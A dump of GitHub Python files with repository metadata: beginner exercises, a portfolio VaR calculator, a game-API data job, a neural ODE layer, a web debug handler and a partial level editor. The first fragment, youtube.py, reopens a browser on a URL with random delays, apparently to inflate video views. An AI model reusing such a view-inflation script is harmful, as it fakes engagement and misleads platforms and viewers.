\"View : {}\".format(_viewCount()))\r\n_thread.start_new_thread(_viewCheckRoutine,())\r\n\r\ndef randomDelay():\r\n delayTime = random.randrange(20 , 50)\r\n time.sleep(delayTime)\r\n\r\n\r\ndef chromeThread (a=0):\r\n for i in range(5):\r\n if i <5:\r\n randomDelay()\r\n web = webdriver.Chrome()\r\n web.get(_URL)\r\n time.sleep(120)\r\n randomDelay()\r\n web.quit()\r\n else:\r\n break\r\n\r\n\r\n\r\n\r\n\r\nwith concurrent.futures.ThreadPoolExecutor (max_workers=4) as ex :\r\n threads = {ex.submit(chromeThread,0) : 0 for i in range(1)}\r\n for future in concurrent.futures.as_completed(threads):\r\n url = threads[future]\r\n try :\r\n data = future.result()\r\n except Exception as err:\r\n print(err)\r\n","repo_name":"ltdpttk/pass","sub_path":"youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73278266130","text":"import itertools\r\n\r\ndef dev_options_form_parts(patrs_number):\r\n option = [1,0]\r\n option_list = []\r\n n=0\r\n while n < patrs_number:\r\n for rec in option:\r\n print(rec)\r\n \r\n option_list.append(option + 0)\r\n #option_list.append(option + 1)\r\n n = n+1\r\n return option_list\r\n# i läuft von 1 bis n\r\n#soll eine [0,1] generieren\r\n#diese verduppeln\r\n#jedes element aus [[0,1,0,0,i],[2i]] mit nx1 und 2nx0 erweitern\r\n\r\ndef gen_all_possible_job_sequences(jobs_data):\r\n jobs =[]\r\n for operation, job_list in jobs_data.items():\r\n for job in job_list:\r\n jobs.append(job)\r\n\r\n job_possibilities =itertools.permutations(jobs)\r\n return\r\n","repo_name":"wasilina83/opt_jobshop","sub_path":"optionsgenerator.py","file_name":"optionsgenerator.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"36571544221","text":"import os\nimport art\n\nart\n\nno_more_bidders = False\n\nbids = {}\n\ndef find_highest_bidder(bids):\n\n highest_bid = 0\n winner = \"\"\n\n for bidder in bids:\n bid_amount = bids[bidder]\n if bid_amount > highest_bid:\n highest_bid = bid_amount\n winner = bidder\n os.system('cls')\n print(f\"The winner is {winner} with a bid of £{highest_bid}\")\n\nwhile not no_more_bidders:\n\n name = input(\"Please enter your name: \")\n bid = int(input(\"Please enter your bid: \"))\n\n bids[name] = bid\n\n if input(\"Are there any more bidders? Yes / No : \").lower() == \"no\":\n no_more_bidders = True\n find_highest_bidder(bids)\n\n else:\n os.system('cls')\n\n","repo_name":"dcooper-holmes/PythonProjects","sub_path":"100-Days-Of-Code/Day-9-Secret-Auction/SecretAuction.py","file_name":"SecretAuction.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40003010510","text":"import math\n\ndef nCr(n,r):\n Nf=math.factorial(n)\n Rf=math.factorial(r)\n NminusRf=math.factorial(n-r)\n return Nf//(Rf*NminusRf)\n\n# n,r=map(int,input().split())\nn=input(\"n>>\")\nr=input(\"r>>\")\n\nprint(nCr(n,r))","repo_name":"shinkeonkim/KMU_Class","sub_path":"1-1/python/funtion_factorial.py","file_name":"funtion_factorial.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"10315422689","text":"import pandas as pd\r\nimport numpy as np\r\n\r\ndef PLcalc(lastweek, thisweek):\r\n \tS= 'S' # prefix\r\n \tT = '.txt' # suffix\r\n \tBS = 'BS'\r\n\r\n \tdate = str(lastweek) # date\r\n \tFNlast = S+date+T # filename\r\n \tSlast = pd.read_table(FNlast, sep=' ', header=None)\r\n\r\n \tdate = str(thisweek) # date\r\n \tFNthis = S+date+T # filename\r\n \tSthis = pd.read_table(FNthis, sep=' ', header=None)\r\n\r\n \tdate = str(lastweek)\r\n \tFNBSlast = BS+date+T\r\n \tBSlast = pd.read_table(FNBSlast,sep=' ', header=None )\r\n \t#print(BSlast)\r\n\r\n \tPL = ((Sthis[1]-Slast[1])/Slast[1]*BSlast[1])+((Sthis[2]-Slast[2])/Slast[2]*BSlast[2])\r\n \t#print(PL)\r\n\r\n \tCthis = BSlast[0]\r\n \tAthis0 = Sthis[1]/Slast[1]*BSlast[1]\r\n \tAthis1 = Sthis[2]/Slast[2]*BSlast[2]\r\n \tBSthis = pd.concat([Cthis, Athis0, Athis1],axis=1)\r\n \t#print(BSthis)\r\n\r\n \tNetValue=Cthis+Athis0+Athis1\r\n \t#print(NetValue)\r\n\r\n \tdate = str(thisweek)\r\n \tBSthis.to_csv(BS+date+T, sep=' ', header=False, index=False)\r\n \treturn PL\r\n\r\ndef var_calc(thisweek,term):\r\n\tS = 'S' # prefix\r\n\tT = '.txt' # suffix\r\n\tBS = 'BS'\r\n\r\n\tnames = ['cash','tyo','ben']\r\n\tr = []\r\n\tfor name in names:\r\n\t\tFileName = name + '.csv'\r\n\t\tdf = pd.read_csv(FileName)\r\n\t\ta_df = df.values\r\n\t\titemcounter = 0\r\n\t\tfor item in a_df:\r\n\t\t\tif itemcounter ==0:\r\n\t\t\t\tr1 = []\r\n\t\t\t\titemcounter +=1\r\n\t\t\telse:\r\n\t\t\t\tvaluetoday = a_df[itemcounter][0]\r\n\t\t\t\tvalueyesterday = a_df[itemcounter-1][0]\r\n\t\t\t\treturntoday = (valuetoday-valueyesterday)/valueyesterday\r\n\t\t\t\tr1.append(returntoday)\r\n\t\t\t\titemcounter +=1\r\n\t\tr.append(r1)\r\n\r\n\tdf = pd.DataFrame(data = r, index = names)\r\n\t#print(df)\r\n\r\n\t#toyota = df.iloc[1,:]\r\n\t#sony = df.iloc[2,:]\r\n\r\n\tmu = df.mean(axis=1)\r\n\t#print(mu)\r\n\tdate = str(thisweek)\r\n\tFNBSthis = BS+date+T\r\n\tbs = pd.read_table(FNBSthis, sep=' ', names = names)\r\n\tbst = bs.T\r\n\r\n\tbsa = np.array(bs)\r\n\tbsta = np.array(bst)\r\n\t#print(bsa)\r\n\t#print(bsta)\r\n\r\n\tdot = np.dot(bsa, mu) #行列の内積\r\n\t#print(dot)\r\n\r\n\tcov = np.cov(df, rowvar = 1, bias = 1) #共分散行列\r\n\t#print(cov)\r\n\r\n\t#dot3 = np.dot(np.dot(bsa, cov), bsta)\r\n\t#print(dot3)\r\n\r\n\tdot3 = bsa@cov@bsta #行列の掛算3つ以上\r\n\t#print(dot3)\r\n\tT = term\r\n\tVaR = -dot*T + 2.33*np.sqrt(dot3*T)\r\n\t#print(VaR)\r\n\treturn VaR","repo_name":"kazutaka-lab/tech-base","sub_path":"my_function.py","file_name":"my_function.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"15589942112","text":"from decouple import config\nfrom datetime import datetime\nimport os\nimport requests\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\n\nAPI_TOKEN = config('API_TOKEN')\nDATABASE_URL = config('DATABASE_URL')\nFIXIE_URL = config('FIXIE_URL')\nURI = DATABASE_URL[:8] + 'ql' + DATABASE_URL[8:]\n\ndate = datetime.utcnow()\n\nif date.weekday() == 2:\n\n club_tag = '#2YPY9LVV9'\n headers = {\n 'Authorization' : f'Bearer {API_TOKEN}',\n }\n proxies = {\n 'http' : os.environ.get('FIXIE_URL', ''),\n 'https' : os.environ.get('FIXIE_URL', ''),\n }\n response = requests.get(\n # the hashtag '#' is encoded as '%23' in the URL\n f'https://api.brawlstars.com/v1/clubs/%23{club_tag[1:]}/members',\n headers=headers,\n proxies=proxies,\n )\n club_members_list = response.json()['items']\n \n season = f'{date.year}-{date.isocalendar().week}'\n club_members_df = pd.DataFrame(\n {\n 'season' : [season] * len(club_members_list),\n 'player_tag' : [member['tag'] for member in club_members_list],\n 'player_name' : [member['name'] for member in club_members_list],\n 'trophies' : [member['trophies'] for member in club_members_list],\n },\n )\n \n engine = create_engine(URI, poolclass=NullPool)\n with engine.connect() as connection:\n club_members_df.to_sql(\n 'club_members',\n connection,\n if_exists='append',\n index=False\n )\n connection.execute(\n f''' INSERT INTO job_log (job_timestamp, job)\n VALUES('{date}', 'get_club_members.py'); '''\n )\n\n print('Script get_club_members.py executed successfully.')\n\nelse:\n print('Today is not Wednesday.')\n","repo_name":"pascalaigner/brawl-stars-club-league","sub_path":"scheduled_jobs/get_club_members.py","file_name":"get_club_members.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
+{"seq_id":"34943596347","text":"from multiprocessing import Pool\nimport os, time, random\n\n''''\n当需要创建的⼦进程数量不多时,可以直接利⽤multiprocessing中的Process\n动态成⽣多个进程,但如果是上百甚⾄上千个⽬标,⼿动的去创建进程的⼯\n作量巨⼤,此时就可以⽤到multiprocessing模块提供的Pool⽅法。\n初始化Pool时,可以指定⼀个最⼤进程数,当有新的请求提交到Pool中时,\n如果池还没有满,那么就会创建⼀个新的进程⽤来执⾏该请求;但如果池中\n的进程数已经达到指定的最⼤值,那么该请求就会等待,直到池中有进程结\n束,才会创建新的进程来执⾏\n'''\n\n\ndef worker(msg):\n t_start = time.time()\n print(\"%s开始执⾏,进程号为%d\" % (msg, os.getpid()))\n # random.random()随机⽣成0~1之间的浮点数\n time.sleep(random.random() * 2)\n t_stop = time.time()\n print(msg, \"执⾏完毕,耗时%0.2f\" % (t_stop - t_start))\n\n\npo = Pool(3) # 定义⼀个进程池,最⼤进程数3\nfor i in range(0, 10):\n # Pool.apply_async(要调⽤的⽬标,(传递给⽬标的参数元祖,))\n # 每次循环将会⽤空闲出来的⼦进程去调⽤⽬标 如果超过了指定的最大数量 也会添加进去的\n # apply_async 是非堵塞的 apply是堵塞的\n po.apply_async(worker, (i,))\n # po.apply(worker, (i,))\n print(\"----start----\")\npo.close() # 关闭进程池,关闭后po不再接收新的请求\npo.join() # 等待po中所有⼦进程执⾏完成,必须放在close语句之后 不join池中的进程不会执行\nprint(\"-----end-----\")\n","repo_name":"zoushiqing/python","sub_path":"第二章 python核心编程/第2节Linux系统编程/进程/进程池Pool.py","file_name":"进程池Pool.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35748016529","text":"\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\nfrom torch.nn.modules.module import Module\n\nimport torch.nn as nn\n# from torchdiffeq import odeint_adjoint as odeint\nfrom torchdiffeq import odeint as odeint\nimport geotorch\nimport os\n\n\n\ndef act1(x): \n act_main = torch.nn.ELU(inplace=False)\n return 0.5*(torch.pow(F.relu(x),2)+ act_main(x))\n\n######### option 2 ############\n#act = ln((exp(x)+1)/2) if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act2(xx): \n m = 1.1 ##m >=1\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + m*torch.log((torch.exp(F.relu(x))+1)/2+1e-8)\n\n######### option 3 ############\n#act = x^m+0.5x if x>0 and = -sqrt(|x-1|)+1 if x<0\ndef act3(xx): \n m = 3 ##m>=2\n a = 0.1\n x = a*xx\n return -F.relu(torch.sqrt(torch.abs(torch.minimum(x-1,torch.tensor(0)))+1e-8)-1) + torch.pow(F.relu(x),m)+ 0.5*F.relu(x)\n\n\nclass my_act(nn.Module):\n def __init__(self, act):\n super(my_act, self).__init__()\n self.act = act\n \n def forward(self, x):\n return self.act(x)\n\n##################### pos_constraint for weight ################\n\n######### option 1 ############\n# def pos_constraint(x):\n# # act = torch.sigmoaid()\n# return torch.sigmoid(x)*0.001\n\n######### option 2 ############\ndef pos_constraint(x):\n# act = torch.sigmoaid()\n return torch.abs(x)\n\n\nclass ReHU(nn.Module):\n \"\"\" Rectified Huber unit\"\"\"\n def __init__(self, d):\n super().__init__()\n self.a = 1/d\n self.b = -d/2\n\n def forward(self, x):\n return torch.max(torch.clamp(torch.sign(x)*self.a/2*x**2,min=0,max=-self.b),x+self.b)\n \n \n \n\n \n \ndef batch_jacobian(func, x, create_graph=False):\n # x in shape (Batch, Length)\n def _func_sum(x):\n return func(x).sum(dim=0)\n\n return torch.autograd.functional.jacobian(_func_sum, x, create_graph=create_graph).permute(1,2,0)\n\nclass myLinear(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n \n ## input --> f0 (2*dim, 2*dim) --> f1 (2*dim, 8*dim) --> f2 (8*dim, 2*dim) --> f3 (2*dim, 1)\n #### from f1 to f3, we need the weight to be postive, that's why we call pos_constraint() below\n ##### all activation function need to be convex and non-decreasing #######\n \n \n self.dim = size_in\n \n # self.act = my_act(act1)\n # self.act = act2\n self.act = ReHU(d=0.1)\n\n \n max_ = +0.001\n min_ = -0.001\n # max_ = +0.0002\n # min_ = -0.0002\n \n w1_z = torch.Tensor(self.dim*8, self.dim*2)\n self.w1_z = nn.Parameter(w1_z)\n b1 = torch.Tensor(self.dim*8)\n self.b1 = nn.Parameter(b1)\n \n w2_z = torch.Tensor(self.dim*2, self.dim*8)\n self.w2_z = nn.Parameter(w2_z)\n b2 = torch.Tensor(self.dim*2)\n self.b2 = nn.Parameter(b2)\n \n w3_z = torch.Tensor(1, self.dim*2)\n self.w3_z = nn.Parameter(w3_z)\n b3 = torch.Tensor(1)\n self.b3 = nn.Parameter(b3)\n \n self.w0_y = nn.Linear(in_features=2*self.dim,out_features=2*self.dim) ####w0_y is free, and no constraints\n \n \n ####### initial the parameters ###########\n self.b1.data.uniform_(min_, max_)\n self.w1_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w1_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w1_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n\n # torch.nn.init.normal_(self.w1_z)\n # torch.nn.init.normal_(self.b1)\n\n # torch.nn.init.xavier_uniform_(self.w1_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b1, gain=1.0)\n # torch.nn.init.constant_(self.b1, val=0.001)\n\n ####### initial the parameters ###########\n 
self.b2.data.uniform_(min_, max_)\n self.w2_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w2_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w2_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w2_z)\n # torch.nn.init.normal_(self.b2)\n\n # torch.nn.init.xavier_uniform_(self.w2_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b2, gain=1.0)\n # torch.nn.init.constant_(self.b2, val=0.001)\n\n ####### initial the parameters ###########\n self.b3.data.uniform_(min_, max_)\n self.w3_z.data.uniform_(min_, max_)\n # nn.init.xavier_uniform_(self.w3_z.data, gain=1.414)\n # nn.init.kaiming_normal_(self.w3_z.data, mode=\"fan_out\", nonlinearity=\"relu\")\n # torch.nn.init.normal_(self.w3_z)\n # torch.nn.init.normal_(self.b3)\n\n # torch.nn.init.xavier_uniform_(self.w3_z, gain=1.0)\n # # torch.nn.init.xavier_uniform_(self.b3, gain=1.0)\n # torch.nn.init.constant_(self.b3, val=0.001)\n\n\n\n \n def forward(self, x):\n z1 = self.act(self.w0_y(x))\n \n w1_z = pos_constraint(self.w1_z)\n z2 = F.linear(z1, w1_z, bias=self.b1)\n z2 = self.act(z2)\n \n \n w2_z = pos_constraint(self.w2_z)\n z3 = F.linear(z2, w2_z, bias=self.b2)\n z3 = self.act(z3)\n \n \n w3_z = pos_constraint(self.w3_z)\n z4 = F.linear(z3, w3_z, bias=self.b3)\n z4 = self.act(z4)\n \n \n f = z4\n \n return f\n \nclass Hamilton_V2(nn.Module):\n def __init__(self, size_in):\n super().__init__()\n self.dim = size_in\n \n self.H = myLinear(self.dim)\n\n \n def forward(self,t, input_):\n ### input_ should be 2xdim as [x, v], where x is manifold position and v is the tangent vector\n ### If you only have v, set x as 0\n \n x = input_[...,0:self.dim]\n v = input_[...,self.dim:]\n \n \n H_derivatie = batch_jacobian(lambda xx: self.H(xx), input_, create_graph=True).squeeze()\n # print(H_derivatie.shape)\n \n dx = H_derivatie[...,0:self.dim]\n dv = -1*H_derivatie[...,self.dim:]\n\n \n out = torch.hstack([dx, dv])\n \n \n return out\n\nif __name__=='__main__':\n ######## select convex activation function ###########\n act = act1\n\n\n dim = 16\n con = Hamilton_V2(dim)\n a = torch.zeros(128,dim*2)\n b = con(a)","repo_name":"zknus/Hamiltonian-GNN","sub_path":"layers/H_2.py","file_name":"H_2.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"17327808549","text":"import webapp2\nimport urlparse\n\nimport tests\n\nimport types\nimport random\nimport os\nimport time\n\nclass MSDebugHandler( webapp2.RequestHandler ):\n\n def get( self, testname, path ):\n start_time = time.time()\n \n if len(path) == 0:\n path = \"/\"\n\n if path[0] != '/':\n path = \"/\" + path\n \n args = self.request.GET.dict_of_lists()\n \n for (k,v) in args.items():\n if type(v) == types.ListType and len(v) == 1:\n args[k] = v[0]\n \n # debug request\n test = getattr( tests, testname )\n status = None\n msg = None\n if test == None:\n status = 404\n msg = \"No such test '%s'\" % testname\n else:\n status, msg = test.test( path, args )\n\n self.response.status = status\n self.response.headers['X-Total-Time'] = str( int( (time.time() - start_time) * 1e9) )\n self.response.write( msg )\n return\n\n def put( self, _path ):\n pass","repo_name":"syndicate-storage/syndicate","sub_path":"ms/tests/debughandler.py","file_name":"debughandler.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"53"}
+{"seq_id":"24854823973","text":"# handles modes besides graph3D, setting modes, and help\r\nfrom Graph3D import *\r\n\r\n# turns equation list to string\r\ndef formEquationString(equation):\r\n result = \"\"\r\n for entry in equation:\r\n result += str(entry)\r\n return result\r\n\r\ndef getCursorPosition(data):\r\n if len(data.inputs)==0:\r\n return [0,0]\r\n row = data.inputs[:data.cursorListPosition].count(\"\\n\")\r\n totalRows = data.inputs.count(\"\\n\")\r\n centerRow = totalRows/2\r\n textDY = (row-centerRow)*data.textLineHeight\r\n if data.cursorListPosition==0:\r\n textDX = 0\r\n elif data.inputs[data.cursorListPosition-1]==\"\\n\":\r\n textDX = 0\r\n else:\r\n lineStartIndex = data.cursorListPosition-1\r\n while True:\r\n if lineStartIndex==0:\r\n break\r\n elif data.inputs[lineStartIndex-1] != \"\\n\":\r\n lineStartIndex -= 1\r\n else:\r\n break\r\n lineDistance = 0\r\n for i in range(lineStartIndex, data.cursorListPosition):\r\n lineDistance += len(str(data.inputs[i]))\r\n textDX = lineDistance*data.textWidth\r\n data.cursorPosition = [textDX, textDY]\r\n\r\n################################################################################\r\n## KeyPressed\r\n################################################################################\r\n\r\ndef keyPressed3DOptions(event, data):\r\n if data.mode in [\"function3DList\", \"parametric3D2PList\", \"parametric3D1PList\"]:\r\n keyPressed3DList(event, data)\r\n elif data.mode in [\"function3DInput\", \"parametric3D2PInput\", \"parametric3D1PInput\"]:\r\n keyPressed3DInput(event, data)\r\n\r\ndef keyPressed3DList(event, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\":\r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n boxHeight = data.equationBoxSize[1]*boxFactor\r\n if event.keysym==\"Up\":\r\n if data.listScroll<0:\r\n data.listScroll += data.listScrollSpeed\r\n elif event.keysym==\"Down\":\r\n if data.equationBoxSize[1]+(len(graphList)+1)*boxHeight+data.listScroll>=data.height:\r\n data.listScroll -= data.listScrollSpeed\r\n\r\ndef keyPressed3DInput(event, data):\r\n if data.mode==\"function3DInput\":\r\n allowedKeysym = \"1234567890xyzep\"\r\n elif data.mode==\"parametric3D2PInput\":\r\n allowedKeysym = \"1234567890xyztuep\"\r\n elif data.mode==\"parametric3D1PInput\":\r\n allowedKeysym = \"1234567890xyztep\"\r\n \r\n if event.keysym in allowedKeysym or event.char in data.extraKeys or event.keysym==\"Return\":\r\n if event.keysym==\"p\":\r\n data.inputs.insert(data.cursorListPosition, \"π\")\r\n elif event.keysym==\"Return\":\r\n data.inputs.insert(data.cursorListPosition, \"\\n\")\r\n else:\r\n data.inputs.insert(data.cursorListPosition, event.char)\r\n data.cursorListPosition += 1\r\n elif event.keysym==\"BackSpace\":\r\n if data.cursorListPosition>0:\r\n data.inputs.pop(data.cursorListPosition-1)\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Left\":\r\n if data.cursorListPosition>0:\r\n data.cursorListPosition -= 1\r\n elif event.keysym==\"Right\":\r\n if data.cursorListPosition=boxHeight/boxFactor:\r\n whichFunction = int((event.y-boxHeight/boxFactor-data.listScroll)/boxHeight)\r\n if whichFunction==len(graphList):\r\n data.modifyIndex = \"new\"\r\n data.mode = inputMode\r\n elif whichFunction=topLeft[0] and event.y>=topLeft[1]:\r\n col = int((event.x-topLeft[0])/buttonWidth)\r\n row = 
int((event.y-topLeft[1])/buttonHeight)\r\n if (row,col) == (0,0):\r\n if data.keyboardMode==\"trig\":\r\n data.keyboardMode = \"inv\"\r\n else:\r\n data.keyboardMode = \"trig\"\r\n elif keyMask[row][col]==1:\r\n data.inputs.insert(data.cursorListPosition, keys[row][col])\r\n data.cursorListPosition += 1\r\n getCursorPosition(data)\r\n\r\n################################################################################\r\n## DRAW\r\n################################################################################\r\n\r\ndef drawOptions3DMode(canvas, data):\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draws other boxes\r\n boxWidth, boxHeight = data.options3DBoxSize[0], data.options3DBoxSize[1]\r\n canvas.create_rectangle((data.width/2-boxWidth/2,boxHeight),\\\r\n (data.width/2+boxWidth/2,2*boxHeight), width=1)\r\n canvas.create_text((data.width/2,3*boxHeight/2),\\\r\n text=\"Functions\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,2*boxHeight),\\\r\n (data.width/2+boxWidth/2,3*boxHeight), width=1)\r\n canvas.create_text((data.width/2,5*boxHeight/2),\\\r\n text=\"Parametric (2 Parameters)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n \r\n canvas.create_rectangle((data.width/2-boxWidth/2,3*boxHeight),\\\r\n (data.width/2+boxWidth/2,4*boxHeight), width=1)\r\n canvas.create_text((data.width/2,7*boxHeight/2),\\\r\n text=\"Parametric (1 Parameter)\", font=\"Arial \"+str(int(boxHeight/4)))\r\n\r\n\r\ndef draw3DList(canvas, data):\r\n if data.mode==\"function3DList\":\r\n graphList = data.graphsFunction3D\r\n boxFactor = 1\r\n elif data.mode==\"parametric3D2PList\":\r\n graphList = data.graphsParametric3D2P\r\n boxFactor = 2\r\n elif data.mode==\"parametric3D1PList\": \r\n graphList = data.graphsParametric3D1P\r\n boxFactor = 2\r\n # draws every 3D function\r\n boxWidth, boxHeight = data.equationBoxSize[0], data.equationBoxSize[1]*boxFactor\r\n margin = data.width/20\r\n for i in range(len(graphList)+1):\r\n canvas.create_rectangle((0,boxHeight*i+data.equationBoxSize[1]+data.listScroll),\\\r\n (boxWidth,boxHeight*(i+1)+data.equationBoxSize[1]+data.listScroll), width=1)\r\n # add function\r\n if i==len(graphList):\r\n canvas.create_text((data.width/2,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n text=\"+\", fill=\"lime green\", font=\"Arial \"+str(int(boxHeight/2/boxFactor)))\r\n # existing functions\r\n else:\r\n canvas.create_text((margin,boxHeight*(i+0.5)+data.equationBoxSize[1]+data.listScroll),\\\r\n anchor=\"w\", text=formEquationString(graphList[i].display),\\\r\n font=\"Courier \"+str(int(boxHeight/5/boxFactor)))\r\n canvas.create_rectangle((0,0), (data.width,data.equationBoxSize[1]), width=0, fill=\"white\")\r\n # draw return box\r\n boxWidth, boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n\r\n\r\ndef draw3DInput(canvas, data):\r\n if data.mode==\"function3DInput\":\r\n keyMask = data.function3DKeyMask\r\n elif data.mode==\"parametric3D2PInput\":\r\n keyMask = data.parametric3D2PKeyMask\r\n elif data.mode==\"parametric3D1PInput\": \r\n keyMask = data.parametric3D1PKeyMask\r\n # draw return box\r\n boxWidth, 
boxHeight = data.returnBoxSize[0], data.returnBoxSize[1]\r\n canvas.create_rectangle((0,0), (boxWidth,boxHeight), width=1)\r\n canvas.create_text((boxWidth/2,boxHeight/2), text=\"Return\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Go box\r\n canvas.create_rectangle((data.width-boxWidth,0), (data.width,boxHeight), width=1)\r\n canvas.create_text((data.width-boxWidth/2,boxHeight/2), text=\"Go\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n # draw Delete box\r\n if data.modifyIndex != \"new\":\r\n canvas.create_rectangle((data.width-2*boxWidth,0), (data.width-boxWidth,boxHeight), width=1)\r\n canvas.create_text((data.width-3*boxWidth/2,boxHeight/2), fill=\"red\", text=\"Delete\",\\\r\n font=\"Arial \"+str(int(boxHeight/2)))\r\n \r\n if data.keyboardMode==\"trig\":\r\n keys = data.calcKeyboardTrig\r\n else:\r\n keys = data.calcKeyboardInv\r\n numCols = len(keys[0])\r\n numRows = len(keys)\r\n buttonWidth = data.width/numCols\r\n buttonHeight = buttonWidth*2/3\r\n topLeft = [0, data.height-numRows*buttonHeight]\r\n for row in range(numRows):\r\n for col in range(numCols):\r\n if keyMask[row][col]==1:\r\n boxColor = \"white\"\r\n textColor = \"black\"\r\n else:\r\n boxColor = \"gray70\"\r\n textColor = \"gray30\"\r\n canvas.create_rectangle((topLeft[0]+col*buttonWidth,topLeft[1]+row*buttonHeight),\\\r\n (topLeft[0]+(col+1)*buttonWidth,topLeft[1]+(row+1)*buttonHeight), width=1, fill=boxColor)\r\n canvas.create_text((topLeft[0]+(col+0.5)*buttonWidth,topLeft[1]+(row+0.5)*buttonHeight),\\\r\n text=keys[row][col], fill=textColor, font=\"Courier \"+str(int(buttonHeight/3)))\r\n margin = data.width/20\r\n canvas.create_text((margin,data.height/3), anchor=\"w\", text=formEquationString(data.inputs),\\\r\n font=\"Courier \"+str(int(buttonHeight/2)))\r\n textHeight = data.textHeight\r\n textWidth = data.textWidth\r\n canvas.create_line((margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]-textHeight/2),\\\r\n (margin+data.cursorPosition[0],data.height/3+data.cursorPosition[1]+textHeight/2), width=1)\r\n","repo_name":"axu682/3D-Graphing-Calculator","sub_path":"InputModes.py","file_name":"InputModes.py","file_ext":"py","file_size_in_byte":14435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33704547375","text":"from portal import colors\nfrom portal.geometry import Position\nfrom portal.wall import Wall, PortalWall, Ledge, Door, Grill\nfrom portal.entity import Portal, Cube, Button\n\nclass Tool:\n def __init__(self, canvas, level):\n self.canvas = canvas\n self.level = level\n self.setup()\n\n def setup(self):\n pass\n\n def mousedown(self, x, y):\n pass\n\n def mousemove(self, x, y):\n pass\n\n def mouseup(self, x, y):\n pass\n\nclass PlayerTool(Tool):\n name = 'Place player'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.start.move_to(p)\n self.level.player.move_to(p)\n self.canvas.redraw()\n\nclass GoalTool(Tool):\n name = 'Place goal'\n def mousedown(self, x, y):\n p = Position(round(x * 2) * 0.5, round(y * 2) * 0.5)\n self.level.goal.move_to(p)\n self.canvas.redraw()\n\n\nclass SegmentTool(Tool):\n def setup(self):\n self.pos1 = None\n\n def mousedown(self, x, y):\n self.pos1 = Position(round(x), round(y))\n\n def mousemove(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n self.canvas.redraw()\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n segment.draw(self.canvas)\n\n def mouseup(self, x, y):\n if self.pos1:\n pos2 = self._closest_position(round(x), round(y))\n if self.pos1.pos() != pos2.pos():\n segment = self._make_segment(self.pos1, pos2)\n self.level.walls.append(segment)\n self.canvas.redraw()\n self.pos1 = None\n\n def _closest_position(self, x, y):\n if abs(x - self.pos1.x) > abs(y - self.pos1.y):\n return Position(x, self.pos1.y)\n else:\n return Position(self.pos1.x, y)\n\n def _make_segment(self, pos1, pos2):\n raise NotImplementedError\n\nclass WallTool(SegmentTool):\n name = 'Wall'\n def _make_segment(self, pos1, pos2):\n return Wall(pos1, pos2)\n\nclass PortalWallTool(SegmentTool):\n name = 'Portalable wall'\n def _make_segment(self, pos1, pos2):\n return PortalWall(pos1, pos2)\n\nclass LedgeTool(SegmentTool):\n name = 'Ledge'\n def _make_segment(self, pos1, pos2):\n return Ledge(pos1, pos2)\n\nclass DoorTool(SegmentTool):\n name = 'Door'\n def _make_segment(self, pos1, 